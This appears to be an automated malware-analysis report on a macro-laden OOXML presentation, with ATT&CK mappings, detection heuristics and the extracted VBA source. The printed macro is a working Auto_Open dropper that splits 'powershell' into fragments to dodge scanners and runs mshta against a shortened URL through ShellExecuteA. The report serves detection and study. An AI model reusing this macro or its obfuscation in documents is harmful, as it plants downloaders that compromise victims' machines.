MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
The sample is an OOXML document containing VBA macros. The Auto_Open macro triggers a function that reconstructs the string 'powershell.exe' and a command string containing a URL. This command is then executed using ShellExecuteA, indicating the script's intent to download and execute a second-stage payload from the provided URL. The obfuscation of 'powershell' via string splitting is a common technique.
Heuristics 3
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2398 bytes |
SHA-256: 1736387697358a64056b4ebff52c06ab1d495ddc5cbde914332f9946d812017f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Class12"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function MainCallex()
Dim strFile As String
Dim clock As String
Dim coooo As Long
u4 = "" + "p" + "o" + "w" + "e" + "r" + "s" + "h" + "e" + "l" + "l" + "." + "e" + "x" + "e"
u5 = "" + "-c ""c" + "m" + "d m" + "s" + "gbox/rm" + "s" + "h" + "t" + "a "
u6 = "" + "h" + "t" + "t" + "p" + "s" + ":" + "/" + "/" + "w" + "ww" + "." + "bitl"
u7 = "" + "y.com/"
u8 = "" + """yuieqwbdnasvdjamsuhdbksd"
ii = u5 + u6 + u7 + u8
clock = "OPEN"
Dim bhosa As New Class3
bhosa. _
Callex u4, ii
End Function
Attribute VB_Name = "Module111"
Sub Auto_Open()
Dim obj As New Class12
obj.MainCallex
End Sub
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 Then
#If Win64 Then ' Declare using PtrSafe for Office 64 bit
Private Declare PtrSafe Function Dainava Lib "shell32.dll" Alias "ShellExecuteA" ( _
ByVal hwnd As LongPtr, ByVal lpOperation As String, ByVal lpFile As String, _
ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As LongPtr
#Else ' Declare for Office 32 bit
Private Declare Function Dainava Lib "shell32.dll" Alias "ShellExecuteA" ( _
ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, _
ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#End If
#Else ' Declare for Office 32 bit
Private Declare Function Dainava Lib "shell32.dll" Alias "ShellExecuteA" ( _
ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, _
ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#End If
Public Sub Callex(ByVal mora As String, ByVal nora As String)
Dim nona As Integer
nona = Dainava(0&, "", mora, nora, "", 0)
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 23040 bytes |
SHA-256: 0f69a787e873a472cc7cd63baea42edc4548625bfcab63cfd578901f47d4da49 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.